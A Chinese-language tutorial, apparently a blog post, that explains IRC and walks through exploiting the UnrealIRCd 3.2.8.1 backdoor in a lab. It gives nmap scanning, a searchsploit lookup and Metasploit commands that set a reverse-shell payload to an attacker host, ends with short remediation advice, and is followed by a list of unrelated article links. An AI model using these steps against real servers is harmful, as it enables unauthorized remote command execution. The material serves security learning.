irc介绍

IRC是Internet Relay Chat 的英文缩写,中文一般称为互联网中继聊天。它是由芬兰人Jarkko Oikarinen于1988年首创的一种网络聊天协议。经过十年的发展,目前世界上有超过60个国家提供了IRC的服务,IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可。这个时候,就可以通过irc聊天,它的特点是速度非常之快,聊天时几乎没有延迟现象,并且只占用很小的带宽资源,使得速度更快。所有用户可以在一个被称为"Channel"(频道)的地方就某一话题进行交谈或密谈。每个IRC的使用者都有一个Nickname(昵称),用来区分不同用户。

默认情况下,irc服务器运行在6667端口。

探测目标irc

使用nmap -sV -p 6667 IP地址 探测目标irc版本信息

nmap -sV -p 6667 192.168.42.137

可以看到,很快探测出目标版本信息

msf利用irc后门

使用searchsploit查找可以利用的POC

searchsploit UnrealIRCd

可以查看到,当前软件是否存在问题,我们在这里选择Backdoor Command Execution(Metasploit),进行利用

use exploit/unix/irc/unreal_ircd_3281_backdoor
show options
set payload cmd/unix/reverse
show options
set lhost 192.168.42.128
exploit

利用msf中对于irc后门连接的模块,连接shell。

可以看到,探测完成,建立了session,我们可以在这里执行任意命令

修复防御

1、升级软件版本

2、更换其他软件

6-25漏洞利用-irc后门利用相关推荐

  1. 英特尔CPU控制机制存在隐秘开关 可被黑客利用成为后门

    本文讲的是 英特尔CPU控制机制存在隐秘开关 可被黑客利用成为后门,研究人员发现为政府客户设置的未公开通融措施 俄罗斯科技公司 Positive Technologies 的安全研究员,发现了未公开配 ...

  2. 漏洞复现-webmin漏洞系列分析与利用

    webmin漏洞系列分析与利用 Webmin 远程代码执行CVE-2022-0824 编号CVE编号:CVE-2022-0824 影响版本 漏洞简介 复现 拉取漏洞镜像 启动漏洞环境 解决方案 POC ...

  3. 磊科路由器后门利用情况分析

    重点物联网 漏洞利用情况本节我们选取了两个漏洞进行分析.UPnP 相关的漏洞我们将在 4.4.3 进行分析,除去 UPnP 相关漏 洞外,被利用最多的是 Eir D1000 路由器的一个漏洞 [44] ...

  4. Redis未授权访问漏洞的重现与利用

    前言: 最近配置openvas的时候安装了redis,听说曾经曝出过一个未授权访问漏洞,便找了一下相关资料想自己动手复现一下漏洞的利用过程,当然所有的攻击性操作都是在虚拟机上完成的,本文所有的操作是在 ...

  5. Apache Tomcat 曝文件包含漏洞:攻击者可利用该漏洞读取webapp目录下的任意文件...

    点击上方蓝色"程序猿DD",选择"设为星标" 回复"资源"获取独家整理的学习资料! 作者 | oschina 来源 | https://ww ...

  6. 别再问Cloudflare CDN 漏洞是怎么被利用的啦!这篇文就来告诉你

    Cloudflare 已修复其免费开源 CDNJS 中的一个严重漏洞,该漏洞可能影响互联网上 12.7% 的网站. CDNJS为数百万网站提供超过4000个JavaScript和CSS库,这些库公开存 ...

  7. Grafana 中存在严重的未授权任意文件读取漏洞,已遭利用

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798),CVS ...

  8. Wget漏洞(CVE-2016-4971)利用方式解析

    漏洞描述 wget是一个用来入侵Web服务器并拦截敏感数据的计算机程序.它基于shellshock漏洞对目标进行入侵.(FB注释:wget名称的由来是"World Wide Web" ...

  9. XXE漏洞详解与利用

    XXE:XML 外部实体注入 XXE(XML External Entity,XML 外部实体注入)正是当允许引用外部实体时,通过构造恶意内容,导致读取任意文件.执行系统命令.内网探测与攻击等危害的一 ...

最新文章

  1. as3绕过策略文件给视频截图
  2. 07-Windows Server 2012 R2 会话远程桌面-标准部署-RD授权
  3. Daily Scrum Meeting ——ZeroDay(Beta)12.08
  4. java获取10位随机数_Java基础:JAVA中BitSet使用详解
  5. win10死机频繁怎么解决
  6. 分享一个非常全的php正则验证车牌格式的函数
  7. 苹果内部文件曝光:iPhone SE3以外,还有大惊喜...
  8. 开启人才进阶之旅,鲲鹏开发者技术沙龙点燃计算行业激情
  9. 接口测试要测试什么?
  10. php mixed约束,Mixed Content: 混合被动/显示内容和混合活动内容
  11. 零基础学python还是c语言-为什么大一先学C语言,而不是Python,你知道为什么吗?...
  12. 遗传算法导论(转载)
  13. Compiz Check测试Linux桌面3D兼容性
  14. 第十四届恩智浦智能车室外电磁比赛总结
  15. SPSS中的数据分析—描述性统计分析【1】
  16. python批量图片转pdf,将TIFF图像批量转换为PDF ImageMagick Python
  17. 使用pktgen-dpdk和l2fwd测试RFC2544
  18. 2016年第四届C/C++ A组蓝桥杯省赛真题
  19. php公众号模板消息重复3,如何利用微信公众号模板消息实现每天多次群发
  20. 详解:淘宝大秒杀系统是如何设计的?

热门文章

  1. 软件测试的目的和原则是什么?
  2. comsol函数的使用(入门级教程)
  3. linux重定向的 符号,linux基础学习-4.3-特殊符号与重定向符号详解
  4. 如何使用Fork版本工具下载分支内容
  5. 父组件给孙子组件传值
  6. 怎么把电脑上的准考证发送到手机上呢
  7. 入行芯片设计选模拟IC还是数字IC?一文为你讲解清楚
  8. Linux ar命令(更改静态库相关属性信息)
  9. 个人对GDT、GDTR、LDT、LDTR的理解
  10. Win10电脑一直循环重启进不了系统桌面怎么办